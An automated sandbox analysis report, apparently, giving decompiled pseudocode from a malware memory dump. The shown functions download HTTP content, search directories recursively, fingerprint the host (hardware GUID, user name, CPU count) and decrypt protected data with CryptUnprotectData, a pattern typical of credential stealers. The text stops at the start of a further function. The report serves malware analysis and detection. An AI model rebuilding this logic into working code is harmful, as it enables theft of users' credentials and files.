
Memory Dump Source

Source File: 00000005.00000002.388217093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID:
API String ID: 2238633743-0
Opcode ID: 63c73c981d721ed519f396d62da7981b54ec637de26aff86e6c897e05b8272c8
Instruction ID: 1d58dfb68342f40b28b35fc8f55cf59418151b06a09c04e22a3330fc5e42e00c
Opcode Fuzzy Hash: 63c73c981d721ed519f396d62da7981b54ec637de26aff86e6c897e05b8272c8
Instruction Fuzzy Hash: 7221FDB5614600AFC748EFA9FE9891677E9F74C301710E63AA609C3270D7B5A841CF6C

Uniqueness

Uniqueness Score: -1.00%

Function 00421CF0, Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 313
networkfileCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E00421CF0(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* _a4) {
				DWORD* _v8;
				char _v16;
				signed int _v20;
				char _v48;
				char _v76;
				long _v80;
				DWORD* _v84;
				DWORD* _v88;
				char _v351;
				void _v352;
				intOrPtr _v356;
				DWORD* _v360;
				DWORD* _v364;
				DWORD* _v368;
				intOrPtr _v372;
				signed int _v376;
				DWORD* _v380;
				DWORD* _v384;
				intOrPtr _v388;
				intOrPtr _v392;
				intOrPtr _v396;
				intOrPtr _v400;
				intOrPtr _v404;
				intOrPtr _v408;
				intOrPtr _v412;
				intOrPtr _v416;
				intOrPtr _v420;
				intOrPtr _v424;
				intOrPtr _v428;
				signed int _t183;
				signed int _t184;
				intOrPtr _t186;
				int _t191;
				intOrPtr _t193;
				intOrPtr _t205;
				intOrPtr _t215;
				intOrPtr _t243;
				intOrPtr _t251;
				void* _t253;
				intOrPtr _t260;
				intOrPtr _t289;
				signed int _t351;
				void* _t352;
				void* _t353;
				void* _t354;
				void* _t355;
				void* _t356;

				_t350 = __esi;
				_t349 = __edi;
				_t253 = __ebx;
				_push(0xffffffff);
				_push(E004265F4);
				_push( *[fs:0x0]);
				_t353 = _t352 - 0x19c;
				_t183 =  *0x4301f4; // 0x3b2bc12f
				_t184 = _t183 ^ _t351;
				_v20 = _t184;
				_push(_t184);
				 *[fs:0x0] =  &_v16;
				_v420 = __ecx;
				_t186 = _v420;
				_t362 =  *((intOrPtr*)(_t186 + 0x28));
				if( *((intOrPtr*)(_t186 + 0x28)) == 0) {
					 *((intOrPtr*)(_v420 + 0x30)) = 0x7800;
					_push( *((intOrPtr*)(_v420 + 0x30))); // executed
					_t251 = E00404349(__edi, __esi, _t362); // executed
					_t353 = _t353 + 4;
					_v392 = _t251;
					 *((intOrPtr*)(_v420 + 0x28)) = _v392;
					 *(_v420 + 0x34) = 0;
				}
				_v84 =  *(_v420 + 0x34);
				_v80 = 0;
				_v88 = 0;
				InternetSetFilePointer(_a4, 0, 0, 0, 0);
				do {
					_t191 = InternetReadFile(_a4,  *((intOrPtr*)(_v420 + 0x28)) +  *(_v420 + 0x34), 0x3e8,  &_v80); // executed
					_v88 = _t191;
					 *(_v420 + 0x34) =  *(_v420 + 0x34) + _v80;
					_t193 = _v420;
					_t260 = _v420;
					_t363 =  *((intOrPtr*)(_t193 + 0x30)) -  *((intOrPtr*)(_t260 + 0x34)) - 0x3e8;
					if( *((intOrPtr*)(_t193 + 0x30)) -  *((intOrPtr*)(_t260 + 0x34)) <= 0x3e8) {
						 *((intOrPtr*)(_v420 + 0x30)) =  *((intOrPtr*)(_v420 + 0x30)) + 0x7800;
						_push( *((intOrPtr*)(_v420 + 0x30))); // executed
						_t243 = E00404349(_t349, _t350, _t363); // executed
						_v396 = _t243;
						_v356 = _v396;
						E00409240(_v356,  *((intOrPtr*)(_v420 + 0x28)),  &(( *(_v420 + 0x34))[0]));
						_v400 =  *((intOrPtr*)(_v420 + 0x28));
						_push(_v400); // executed
						E00405122(); // executed
						_t353 = _t353 + 0x14;
						 *((intOrPtr*)(_v420 + 0x28)) = _v356;
					}
				} while (_v88 != 0 && _v80 > 0);
				_v80 = 0x103;
				_v352 = 0;
				E004091C0( &_v351, 0, 0x103);
				_t354 = _t353 + 0xc;
				if(HttpQueryInfoA(_a4, 0x1d,  &_v352,  &_v80, 0) != 0) {
					_v368 = 0;
					_v360 = 0;
					_v364 = 0;
					_v364 =  *0x4327a8(0x4271e0, 0, 1, 0x4271d0,  &_v368);
					if(_v364 >= 0) {
						_t369 = _v368;
						if(_v368 != 0) {
							E004011C0( &_v48,  &_v352);
							_v8 = 0;
							_t205 = E00421BE0(_t253, _t349, _t350, _t369,  &_v76,  &_v48);
							_t355 = _t354 + 8;
							_v424 = _t205;
							_v428 = _v424;
							_v8 = 1;
							_v364 =  *((intOrPtr*)( *((intOrPtr*)( *_v368 + 0x10))))(_v368, E004020E0(_v428), L"text",  &_v360);
							_v8 = 0;
							E004020C0( &_v76);
							_v8 = 0xffffffff;
							E004012D0( &_v48);
							if(_v364 >= 0) {
								_t371 = _v360;
								if(_v360 != 0) {
									_v376 = ( *(_v420 + 0x34) - _v84) * 7;
									_t215 = E00404349(_t349, _t350, _t371);
									_t356 = _t355 + 4;
									_v404 = _t215;
									_v372 = _v404;
									_v384 = 0;
									_v380 = 0;
									_v364 =  *((intOrPtr*)( *((intOrPtr*)( *_v360 + 0x10))))(_v360, 0,  *(_v420 + 0x34) - _v84,  *((intOrPtr*)(_v420 + 0x28)) + _v84, _v376, _v372,  *(_v420 + 0x34) - _v84,  &_v380,  &_v384, 0, _v376);
									if(_v364 >= 0) {
										_t289 = _v420;
										_t373 =  *((intOrPtr*)(_t289 + 0x30)) - _v84 + _v384;
										if( *((intOrPtr*)(_t289 + 0x30)) <= _v84 + _v384) {
											 *((intOrPtr*)(_v420 + 0x30)) = _v84 +  &(_v384[0xfa]);
											_push( *((intOrPtr*)(_v420 + 0x30)));
											_v408 = E00404349(_t349, _t350, _t373);
											_v388 = _v408;
											E0040518C( *((intOrPtr*)(_v420 + 0x30)), _v388,  *((intOrPtr*)(_v420 + 0x30)),  *((intOrPtr*)(_v420 + 0x28)), _v84);
											_v412 =  *((intOrPtr*)(_v420 + 0x28));
											_push(_v412);
											E00405122();
											_t356 = _t356 + 0x18;
											 *((intOrPtr*)(_v420 + 0x28)) = _v388;
										}
										E0040518C( *((intOrPtr*)(_v420 + 0x28)) + _v84,  *((intOrPtr*)(_v420 + 0x28)) + _v84,  *((intOrPtr*)(_v420 + 0x30)) - _v84, _v372, _v384);
										_t356 = _t356 + 0x10;
										 *(_v420 + 0x34) = _v84 + _v384;
									}
									_v416 = _v372;
									E00405122();
									 *((intOrPtr*)( *((intOrPtr*)( *_v360 + 8))))(_v360, _v416);
								}
							}
							 *((intOrPtr*)( *((intOrPtr*)( *_v368 + 8))))(_v368);
						}
					}
				}
				 *( *((intOrPtr*)(_v420 + 0x28)) +  *(_v420 + 0x34)) = 0;
				 *[fs:0x0] = _v16;
				return E00404354( *(_v420 + 0x34) - _v84, _t253, _v20 ^ _t351,  *(_v420 + 0x34), _t349, _t350);
			}

0x00421cf0
0x00421cf0
0x00421cf0
0x00421cf3
0x00421cf5
0x00421d00
0x00421d01
0x00421d07
0x00421d0c
0x00421d0e
0x00421d11
0x00421d15
0x00421d1b
0x00421d21
0x00421d27
0x00421d2b
0x00421d33
0x00421d43
0x00421d44
0x00421d49
0x00421d4c
0x00421d5e
0x00421d67
0x00421d67
0x00421d77
0x00421d7a
0x00421d81
0x00421d94
0x00421d9a
0x00421dba
0x00421dc0
0x00421dd5
0x00421dd8
0x00421dde
0x00421dea
0x00421df0
0x00421e0b
0x00421e17
0x00421e18
0x00421e20
0x00421e2c
0x00421e50
0x00421e61
0x00421e6d
0x00421e6e
0x00421e73
0x00421e82
0x00421e82
0x00421e85
0x00421e95
0x00421e9c
0x00421eb1
0x00421eb6
0x00421ed4
0x00421eda
0x00421ee4
0x00421eee
0x00421f13
0x00421f20
0x00421f26
0x00421f2d
0x00421f3d
0x00421f42
0x00421f51
0x00421f56
0x00421f59
0x00421f65
0x00421f6b
0x00421f9b
0x00421fa1
0x00421fa8
0x00421fad
0x00421fb7
0x00421fc3
0x00421fc9
0x00421fd0
0x00421fe5
0x00421ff2
0x00421ff7
0x00421ffa
0x00422006
0x0042200c
0x00422016
0x0042207b
0x00422088
0x00422097
0x0042209d
0x004220a0
0x004220bc
0x004220c8
0x004220d1
0x004220dd
0x00422102
0x00422113
0x0042211f
0x00422120
0x00422125
0x00422134
0x00422134
0x0042215f
0x00422164
0x00422176
0x00422176
0x0042217f
0x0042218c
0x004221a6
0x004221a6
0x00421fd0
0x004221ba
0x004221ba
0x00421f2d
0x00421f20
0x004221ce
0x004221e1
0x004221f6

APIs

InternetSetFilePointer.WININET(0042280B,00000000,00000000,00000000,00000000), ref: 00421D94
InternetReadFile.WININET(0042280B,?,000003E8,00000000), ref: 00421DBA
_memset.LIBCMT ref: 00421EB1
HttpQueryInfoA.WININET(0042280B,0000001D,00000000,00000103,00000000), ref: 00421ECC

Part of subcall function 00421BE0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000), ref: 00421C32
Part of subcall function 00421BE0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,0042654F,000000FF,3B2BC12F,?,?,?,?,?,?,?,00000000,0042654F), ref: 00421C79

_memcpy_s.LIBCMT ref: 00422102
_memcpy_s.LIBCMT ref: 0042215F

Strings

text, xrefs: 00421F76

Memory Dump Source

Source File: 00000005.00000002.388217093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ByteCharFileInternetMultiWide_memcpy_s$HttpInfoPointerQueryRead_memset
String ID: text
API String ID: 2061621289-999008199
Opcode ID: 56cc44a652979a3dfb6213643a8babb117dafe26a23d7cc4f79d7bd809ac16db
Instruction ID: b5d8de66111580073d5011e1a7dbd941f0c671664ab485ed23b031e4cb8c210f
Opcode Fuzzy Hash: 56cc44a652979a3dfb6213643a8babb117dafe26a23d7cc4f79d7bd809ac16db
Instruction Fuzzy Hash: 10F114B5A002289FDB24CF58CC80BDAB7B5BF49304F5082D9E509AB391D775AE81CF85

Uniqueness

Uniqueness Score: -1.00%

Function 0041E640, Relevance: 7.7, APIs: 5, Instructions: 236
fileCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E0041E640(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				char _v276;
				void* _v280;
				struct _WIN32_FIND_DATAA _v604;
				char _v868;
				char* _v872;
				intOrPtr* _v876;
				char _v877;
				char _v878;
				intOrPtr _v884;
				intOrPtr _v888;
				intOrPtr* _v892;
				intOrPtr* _v896;
				char _v897;
				char _v898;
				intOrPtr _v904;
				intOrPtr _v908;
				signed int _t103;
				int _t108;
				intOrPtr* _t109;
				int _t111;
				intOrPtr* _t113;
				intOrPtr _t116;
				void* _t117;
				intOrPtr _t118;
				void* _t119;
				intOrPtr _t120;
				void* _t121;
				void* _t143;
				CHAR* _t144;
				char _t146;
				char _t151;
				CHAR* _t153;
				char _t170;
				char _t171;
				void* _t197;
				void* _t198;
				signed int _t199;
				void* _t200;
				void* _t201;
				void* _t203;
				void* _t204;

				_t198 = __esi;
				_t197 = __edi;
				_t143 = __ebx;
				_t103 =  *0x4301f4; // 0x3b2bc12f
				_v8 = _t103 ^ _t199;
				_t144 =  *0x4324d0; // 0xc16788
				_t172 =  &_v276;
				wsprintfA( &_v276, _t144, _a8);
				_t201 = _t200 + 0xc;
				_t108 = FindFirstFileA( &_v276,  &_v604); // executed
				_v280 = _t108;
				if(_v280 != 0xffffffff) {
					do {
						_v872 = ".";
						_v876 =  &(_v604.cFileName);
						while(1) {
							_t109 = _v876;
							_t146 =  *_t109;
							_v877 = _t146;
							if(_t146 !=  *_v872) {
								break;
							}
							if(_v877 == 0) {
								L7:
								_v884 = 0;
								L9:
								_v888 = _v884;
								if(_v888 == 0) {
									L18:
									goto L27;
								} else {
									_v892 = "..";
									_v896 =  &(_v604.cFileName);
									while(1) {
										_t113 = _v896;
										_t151 =  *_t113;
										_v897 = _t151;
										if(_t151 !=  *_v892) {
											break;
										}
										if(_v897 == 0) {
											L15:
											_v904 = 0;
											L17:
											_v908 = _v904;
											if(_v908 != 0) {
												_t153 =  *0x4322bc; // 0xc11490
												wsprintfA( &_v868, _t153, _a8,  &(_v604.cFileName));
												_t116 =  *0x4322d0; // 0xc169e0
												_t117 = E004052FA(_t198,  &(_v604.cFileName), _t116);
												_t203 = _t201 + 0x18;
												if(_t117 != 0) {
													_t118 =  *0x4320e4; // 0xc16758
													_t119 = E004052FA(_t198,  &(_v604.cFileName), _t118);
													_t204 = _t203 + 8;
													if(_t119 != 0) {
														_t120 =  *0x432154; // 0xc168f0
														_t121 = E004052FA(_t198,  &(_v604.cFileName), _t120);
														_t201 = _t204 + 8;
														if(_t121 != 0) {
															if((_v604.dwFileAttributes & 0x00000010) != 0) {
																E0041E640(_t143, _t197, _t198,  &(_v604.cFileName),  &_v868, _a12, _a16, _a20); // executed
																_t201 = _t201 + 0x14;
															}
														} else {
															E0041DA80(_t143, _t197, _t198,  &_v868, _a4, _a12, _a16, _a20); // executed
															_push(_a20);
															_push(_a16);
															E0041B7B0(_t143, _t197, _t198,  &_v868, _a4, _a12); // executed
															E0041E640(_t143, _t197, _t198,  &(_v604.cFileName),  &_v868, _a12, _a16, _a20); // executed
															_t201 = _t201 + 0x3c;
														}
													} else {
														E0041DCA0(_t143, _t197, _t198,  &_v868, _a4, _a12, _a16, _a20); // executed
														E0041E640(_t143, _t197, _t198,  &(_v604.cFileName),  &_v868, _a12, _a16, _a20); // executed
														_t201 = _t204 + 0x28;
													}
												} else {
													E0041E0E0(_t143, _t197, _t198, _a4,  &_v868, _a12, _a16, _a20); // executed
													E0041E640(_t143, _t197, _t198,  &(_v604.cFileName),  &_v868, _a12, _a16, _a20); // executed
													_t201 = _t203 + 0x28;
												}
												goto L27;
											}
											goto L18;
										}
										_t113 = _v896;
										_t170 =  *((intOrPtr*)(_t113 + 1));
										_v898 = _t170;
										_t41 = _v892 + 1; // 0x2e00002e
										if(_t170 !=  *_t41) {
											break;
										}
										_v896 = _v896 + 2;
										_v892 = _v892 + 2;
										if(_v898 != 0) {
											continue;
										}
										goto L15;
									}
									asm("sbb eax, eax");
									asm("sbb eax, 0xffffffff");
									_v904 = _t113;
									goto L17;
								}
							}
							_t109 = _v876;
							_t171 =  *((intOrPtr*)(_t109 + 1));
							_v878 = _t171;
							_t19 =  &(_v872[1]); // 0x2e000000
							if(_t171 !=  *_t19) {
								break;
							}
							_v876 = _v876 + 2;
							_v872 =  &(_v872[2]);
							if(_v878 != 0) {
								continue;
							}
							goto L7;
						}
						asm("sbb eax, eax");
						asm("sbb eax, 0xffffffff");
						_v884 = _t109;
						goto L9;
						L27:
						_t172 =  &_v604;
						_t111 = FindNextFileA(_v280,  &_v604); // executed
					} while (_t111 != 0);
					_t108 = FindClose(_v280); // executed
					goto L29;
				} else {
					L29:
					return E00404354(_t108, _t143, _v8 ^ _t199, _t172, _t197, _t198);
				}
			}

0x0041e640
0x0041e640
0x0041e640
0x0041e649
0x0041e650
0x0041e657
0x0041e65e
0x0041e665
0x0041e66b
0x0041e67c
0x0041e682
0x0041e68f
0x0041e696
0x0041e696
0x0041e6a6
0x0041e6ac
0x0041e6ac
0x0041e6b2
0x0041e6b4
0x0041e6c2
0x00000000
0x00000000
0x0041e6cb
0x0041e6fe
0x0041e6fe
0x0041e715
0x0041e71b
0x0041e728
0x0041e7c2
0x00000000
0x0041e72e
0x0041e72e
0x0041e73e
0x0041e744
0x0041e744
0x0041e74a
0x0041e74c
0x0041e75a
0x00000000
0x00000000
0x0041e763
0x0041e796
0x0041e796
0x0041e7ad
0x0041e7b3
0x0041e7c0
0x0041e7d2
0x0041e7e0
0x0041e7e9
0x0041e7f6
0x0041e7fb
0x0041e800
0x0041e848
0x0041e855
0x0041e85a
0x0041e85f
0x0041e8a7
0x0041e8b4
0x0041e8b9
0x0041e8be
0x0041e92b
0x0041e947
0x0041e94c
0x0041e94c
0x0041e8c0
0x0041e8d7
0x0041e8e2
0x0041e8e6
0x0041e8f6
0x0041e918
0x0041e91d
0x0041e91d
0x0041e861
0x0041e878
0x0041e89a
0x0041e89f
0x0041e89f
0x0041e802
0x0041e819
0x0041e83b
0x0041e840
0x0041e840
0x00000000
0x0041e800
0x00000000
0x0041e7c0
0x0041e765
0x0041e76b
0x0041e76e
0x0041e77a
0x0041e77d
0x00000000
0x00000000
0x0041e77f
0x0041e786
0x0041e794
0x00000000
0x00000000
0x00000000
0x0041e794
0x0041e7a2
0x0041e7a4
0x0041e7a7
0x00000000
0x0041e7a7
0x0041e728
0x0041e6cd
0x0041e6d3
0x0041e6d6
0x0041e6e2
0x0041e6e5
0x00000000
0x00000000
0x0041e6e7
0x0041e6ee
0x0041e6fc
0x00000000
0x00000000
0x00000000
0x0041e6fc
0x0041e70a
0x0041e70c
0x0041e70f
0x00000000
0x0041e94f
0x0041e94f
0x0041e95d
0x0041e963
0x0041e972
0x00000000
0x0041e691
0x0041e978
0x0041e985
0x0041e985

APIs

wsprintfA.USER32 ref: 0041E665
FindFirstFileA.KERNEL32(?,?), ref: 0041E67C
FindNextFileA.KERNELBASE(000000FF,?), ref: 0041E95D
FindClose.KERNEL32(000000FF), ref: 0041E972

Memory Dump Source

Source File: 00000005.00000002.388217093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID:
API String ID: 180737720-0
Opcode ID: c92bd7faf16dffcffc2816398490ef8bca13cdd8a6ab111b19ae1ea951e02468
Instruction ID: 9a695b1c06b5e9649a3d6d3fc0282213006664483c1bee77f7df638368a39451
Opcode Fuzzy Hash: c92bd7faf16dffcffc2816398490ef8bca13cdd8a6ab111b19ae1ea951e02468
Instruction Fuzzy Hash: 50A17CB6904218ABCB25DF65DC84ADBB7B9BB58300F0486CEF91993240E6349FC4CF64

Uniqueness

Uniqueness Score: -1.00%

Function 00416D00, Relevance: 6.1, APIs: 4, Instructions: 137
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E00416D00(intOrPtr __ebx, void* __ecx, intOrPtr __edi, intOrPtr __esi, void* _a4, long _a8) {
				long _v8;
				intOrPtr _v12;
				struct _FILETIME _v20;
				signed short _v24;
				signed short _v28;
				signed int _v32;
				struct _SYSTEMTIME _v48;
				void* _v52;
				signed int _t79;
				intOrPtr _t84;
				long _t86;
				intOrPtr _t93;
				intOrPtr _t94;
				intOrPtr _t105;
				intOrPtr _t120;
				intOrPtr _t122;
				long _t135;
				intOrPtr _t136;
				intOrPtr _t137;
				signed int _t144;

				_t143 = __esi;
				_t142 = __edi;
				_t108 = __ebx;
				_t79 =  *0x4301f4; // 0x3b2bc12f
				_v32 = _t79 ^ _t144;
				_v52 = __ecx;
				 *(_v52 + 0x7c) = 0;
				 *(_v52 + 0x84) = 0;
				 *((char*)(_v52 + 0x80)) = 0;
				 *(_v52 + 0x78) = 0;
				 *(_v52 + 0x70) = 0;
				_t131 = _v52;
				 *(_v52 + 0x90) = 0;
				 *(_v52 + 0x74) = 0;
				if(_a4 != 0 && _a4 != 0xffffffff) {
					_t86 = SetFilePointer( *(_v52 + 4), 0, 0, 1); // executed
					_v8 = _t86;
					if(_v8 == 0xffffffff) {
						 *((intOrPtr*)(_v52 + 0x4c)) = 0x80000000;
						 *(_v52 + 0x70) = 0xffffffff;
						if(_a8 != 0) {
							 *(_v52 + 0x70) = _a8;
						}
						 *((char*)(_v52 + 0x6c)) = 0;
						GetLocalTime( &_v48);
						SystemTimeToFileTime( &_v48,  &_v20);
						_t135 = _v20.dwLowDateTime;
						E00412EB0(_t135, _v20.dwHighDateTime,  &_v28,  &_v24);
						_t93 = E00412F70(_v20.dwLowDateTime, _v20.dwHighDateTime);
						_t120 = _v52;
						 *((intOrPtr*)(_t120 + 0x50)) = _t93;
						 *(_t120 + 0x54) = _t135;
						_t136 = _v52;
						_t94 = _v52;
						 *((intOrPtr*)(_t136 + 0x58)) =  *((intOrPtr*)(_t94 + 0x50));
						 *((intOrPtr*)(_t136 + 0x5c)) =  *((intOrPtr*)(_t94 + 0x54));
						_t122 = _v52;
						_t137 = _v52;
						 *((intOrPtr*)(_t122 + 0x60)) =  *((intOrPtr*)(_t137 + 0x50));
						 *((intOrPtr*)(_t122 + 0x64)) =  *((intOrPtr*)(_t137 + 0x54));
						_t131 = _v52;
						 *(_v52 + 0x68) = _v24 & 0x0000ffff | (_v28 & 0x0000ffff) << 0x00000010;
						 *(_v52 + 0x7c) = _a4;
						_t84 = 0;
					} else {
						_t131 = _v52 + 0x70;
						_t105 = E00414DA0(__ebx, _v52 + 0x70, __edi, __esi, _a4, _v52 + 0x4c, _v52 + 0x70, _v52 + 0x50, _v52 + 0x68); // executed
						_v12 = _t105;
						if(_v12 == 0) {
							SetFilePointer(_a4, 0, 0, 0); // executed
							 *((char*)(_v52 + 0x6c)) = 1;
							_t131 = _a4;
							 *(_v52 + 0x7c) = _a4;
							_t84 = 0;
						} else {
							_t84 = _v12;
						}
					}
				} else {
					_t84 = 0x10000;
				}
				return E00404354(_t84, _t108, _v32 ^ _t144, _t131, _t142, _t143);
			}

0x00416d00
0x00416d00
0x00416d00
0x00416d06
0x00416d0d
0x00416d10
0x00416d16
0x00416d20
0x00416d2d
0x00416d37
0x00416d41
0x00416d48
0x00416d4b
0x00416d58
0x00416d63
0x00416d82
0x00416d88
0x00416d8f
0x00416df9
0x00416e03
0x00416e0e
0x00416e16
0x00416e16
0x00416e1c
0x00416e24
0x00416e32
0x00416e44
0x00416e48
0x00416e58
0x00416e60
0x00416e63
0x00416e66
0x00416e69
0x00416e6c
0x00416e72
0x00416e78
0x00416e7b
0x00416e7e
0x00416e84
0x00416e8a
0x00416e9a
0x00416e9d
0x00416ea6
0x00416ea9
0x00416d91
0x00416da2
0x00416db1
0x00416db9
0x00416dc0
0x00416dd4
0x00416ddd
0x00416de4
0x00416de7
0x00416dea
0x00416dc2
0x00416dc2
0x00416dc2
0x00416dc0
0x00416d6b
0x00416d6b
0x00416d6b
0x00416eb8

APIs

SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00416D82
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00416DD4

Memory Dump Source

Source File: 00000005.00000002.388217093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 62618be7571622379a177c29d08db3d9d465c1196763cd63c7308417d0523072
Instruction ID: 8e38468280a114e1fcc2f1689bfe0d7eb919423b9b9b5c3e97927802504e3f29
Opcode Fuzzy Hash: 62618be7571622379a177c29d08db3d9d465c1196763cd63c7308417d0523072
Instruction Fuzzy Hash: A3510974A10219EFDB04DFA8D894FAEBBB1BF48304F108659E815AB391D735E846CF94

Uniqueness

Uniqueness Score: -1.00%

Function 0041B160, Relevance: 6.0, APIs: 4, Instructions: 34
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E0041B160() {
				signed int _v8;
				struct tagHW_PROFILE_INFOA _v140;
				intOrPtr* _v144;
				signed int _t9;
				int _t12;
				intOrPtr _t13;
				intOrPtr _t19;
				intOrPtr _t25;
				intOrPtr _t26;
				signed int _t27;

				_t9 =  *0x4301f4; // 0x3b2bc12f
				_v8 = _t9 ^ _t27;
				_t12 = GetCurrentHwProfileA( &_v140); // executed
				if(_t12 == 0) {
					_t13 =  *0x4322d4; // 0xc167e8
				} else {
					_v144 = HeapAlloc(GetProcessHeap(), 0, 0x64);
					_t24 = _v144;
					 *_v144 = 0;
					 *0x4328c4(_v144,  &(_v140.szHwProfileGuid));
					_t13 = _v144;
				}
				return E00404354(_t13, _t19, _v8 ^ _t27, _t24, _t25, _t26);
			}

0x0041b169
0x0041b170
0x0041b17a
0x0041b182
0x0041b1c3
0x0041b184
0x0041b195
0x0041b19d
0x0041b1a3
0x0041b1b3
0x0041b1b9
0x0041b1b9
0x0041b1d5

APIs

GetCurrentHwProfileA.ADVAPI32(?), ref: 0041B17A
GetProcessHeap.KERNEL32(00000000,00000064), ref: 0041B188
HeapAlloc.KERNEL32(00000000), ref: 0041B18F
lstrcat.KERNEL32(?,?), ref: 0041B1B3

Memory Dump Source

Source File: 00000005.00000002.388217093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Heap$AllocCurrentProcessProfilelstrcat
String ID:
API String ID: 1316908231-0
Opcode ID: 5e9cce92471f79f1fc9266c3d6701d0b5255154bddcb10c6d5bfd8fdd7ac170c
Instruction ID: 04581f43b4f816d405aec1f7429879156f298d46bcd32117c8786c3065179c69
Opcode Fuzzy Hash: 5e9cce92471f79f1fc9266c3d6701d0b5255154bddcb10c6d5bfd8fdd7ac170c
Instruction Fuzzy Hash: 1301E171A00119DBDB18DF64DD55F99B7B8BB08300F0091AAA94AD7280DE749A84CF64

Uniqueness

Uniqueness Score: -1.00%

Function 0041CB10, Relevance: 4.6, APIs: 3, Instructions: 51
memoryencryptionCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E0041CB10(intOrPtr _a4, char _a8, intOrPtr* _a12, long* _a16) {
				void* _v8;
				long _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				intOrPtr _t23;

				_v16 = _a4;
				_v20 = _a8;
				_t23 =  *0x4327e0( &_v20, 0, 0, 0, 0, 0,  &_v12); // executed
				_v24 = _t23;
				if(_v24 != 0) {
					 *_a16 = _v12;
					 *_a12 = LocalAlloc(0x40,  *_a16);
					if( *_a12 != 0) {
						E00409240( *_a12, _v8,  *_a16);
					}
				}
				return LocalFree(_v8) & 0xffffff00 | _v24 != 0x00000000;
			}

0x0041cb19
0x0041cb1f
0x0041cb34
0x0041cb3a
0x0041cb41
0x0041cb49
0x0041cb5c
0x0041cb64
0x0041cb76
0x0041cb7b
0x0041cb64
0x0041cb92

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0041CB34
LocalAlloc.KERNEL32(00000040,00000000), ref: 0041CB53
LocalFree.KERNEL32(?), ref: 0041CB82

Memory Dump Source

Source File: 00000005.00000002.388217093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Local$AllocCryptDataFreeUnprotect
String ID:
API String ID: 2068576380-0
Opcode ID: b780c5da4f36e3f8844576dea2755cae7d1c8c5e28f2d047ea10ed4f2b2f8513
Instruction ID: d8babcbbd2f812b4631016485bb53f436d95c30e894a7a7b7900c6fdcf07d794
Opcode Fuzzy Hash: b780c5da4f36e3f8844576dea2755cae7d1c8c5e28f2d047ea10ed4f2b2f8513
Instruction Fuzzy Hash: CB1109B8A00209EFCB04DF98D985AEEB7B5FF88300F104569E915A7390D774AE50CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0041B1E0, Relevance: 1.5, APIs: 1, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E0041B1E0() {
				long _v8;
				signed int _v12;
				char _v276;
				signed int _t7;
				intOrPtr _t13;
				intOrPtr _t17;
				intOrPtr _t18;
				intOrPtr _t19;
				signed int _t20;

				_t7 =  *0x4301f4; // 0x3b2bc12f
				_v12 = _t7 ^ _t20;
				_v8 = 0x104;
				GetUserNameA( &_v276,  &_v8); // executed
				return E00404354( &_v276, _t13, _v12 ^ _t20, _t17, _t18, _t19);
			}

0x0041b1e9
0x0041b1f0
0x0041b1f3
0x0041b205
0x0041b21e

APIs

GetUserNameA.ADVAPI32(?,00000104), ref: 0041B205

Memory Dump Source

Source File: 00000005.00000002.388217093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 56bdb6a72e0dac87f3f55412b30fcb29bf9813379c3705124fa6675d9c080625
Instruction ID: 8133e80d8c9d2218205d3359472fc9bf3f4468e9244e7b16e2da7542de10471a
Opcode Fuzzy Hash: 56bdb6a72e0dac87f3f55412b30fcb29bf9813379c3705124fa6675d9c080625
Instruction Fuzzy Hash: 01E0E071D0010C9BCF19EF64D9555DDB7F8EB0C304F4006EDD51597140DA755788CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0041B4E0, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041B4E0() {
				struct _SYSTEM_INFO _v40;

				GetSystemInfo( &_v40); // executed
				return _v40.dwNumberOfProcessors;
			}

0x0041b4ea
0x0041b4f6

APIs

GetSystemInfo.KERNEL32(?), ref: 0041B4EA

Memory Dump Source

Source File: 00000005.00000002.388217093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: 1cc8d28b8b4605765d93da9d3af6540c8237135d299b3c6776b7cd0520ddb65e
Instruction ID: 89a359fd46148dc4c38142b92a7a9c3d480bc9270c14ad80602954946b5873e9
Opcode Fuzzy Hash: 1cc8d28b8b4605765d93da9d3af6540c8237135d299b3c6776b7cd0520ddb65e
Instruction Fuzzy Hash: AAC04C7590421C978A00EAE5994989AB7BCF608501B4005A1ED1993240E661E95486E5

Uniqueness

Uniqueness Score: -1.00%

Function 00420BE0, Relevance: 84.5, APIs: 56, Instructions: 529
stringfileCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E00420BE0(void* __ebx, void* __eflags) {
				struct _SECURITY_ATTRIBUTES* _v8;
				char _v16;
